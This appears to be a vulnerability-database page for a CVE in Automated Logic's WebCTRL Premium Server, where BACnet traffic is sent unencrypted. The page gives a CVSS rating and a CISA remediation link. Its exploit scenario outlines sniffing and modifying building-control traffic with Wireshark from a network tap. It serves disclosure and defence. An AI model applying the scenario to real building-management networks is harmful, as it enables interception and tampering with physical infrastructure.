Severity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Primary rating from NVD · only source for this CVE.
CVSS VectorNVD
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Lifecycle Timeline
3DescriptionCVE.org
Service information is not encrypted when transmitted as BACnet packets over the wire, and can be sniffed, intercepted, and modified by an attacker. Valuable information such as the File Start Position and File Data can be sniffed from network traffic using Wireshark's BACnet dissector filter. The proprietary format used by WebCTRL to receive updates from the PLC can also be sniffed and reverse engineered.
AnalysisAI
This vulnerability affects Automated Logic's WebCTRL Premium Server, which transmits BACnet protocol data in cleartext without encryption. An attacker positioned on the network can sniff sensitive service information including File Start Position, File Data, and proprietary PLC update formats using tools like Wireshark, enabling both information disclosure and potential integrity attacks through modification of intercepted traffic. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | No special conditions — remote unauthenticated exploitation against default BACnet installations. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 3.1 vector (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N) indicates this is a network-exploitable vulnerability with low attack complexity, no privileges required, and high impact to confidentiality and integrity. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker who gains access to the building management network—either through physical access to network infrastructure, compromised credentials on an adjacent system, or lateral movement from another network segment—positions a packet capture tool on a network tap or compromised switch port. Using Wireshark with BACnet dissector filters, the attacker passively captures file transfer operations between WebCTRL Premium Server and connected PLCs, extracting sensitive configuration data, operational parameters, and proprietary update formats. … |
| Remediation | Organizations should immediately consult the CISA ICS advisory at https://www.cisa.gov/news-events/ics-advisories/icsa-26-078-08 and Automated Logic's security commitment page at https://www.automatedlogic.com/en/company/security-commitment/ for specific patch availability and upgrade instructions. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Inventory all WebCTRL Premium Server instances and document network connectivity; restrict network access to these systems using firewall rules to trusted administrative networks only. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
More in Webctrl Premium Server
View allWebCTRL Premium Server contains a port binding vulnerability that allows an attacker with local access to bind to the sa
WebCTRL Premium Server systems contain an authentication bypass vulnerability arising from BACnet protocol's inherent la
Same technique Information Disclosure
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-13840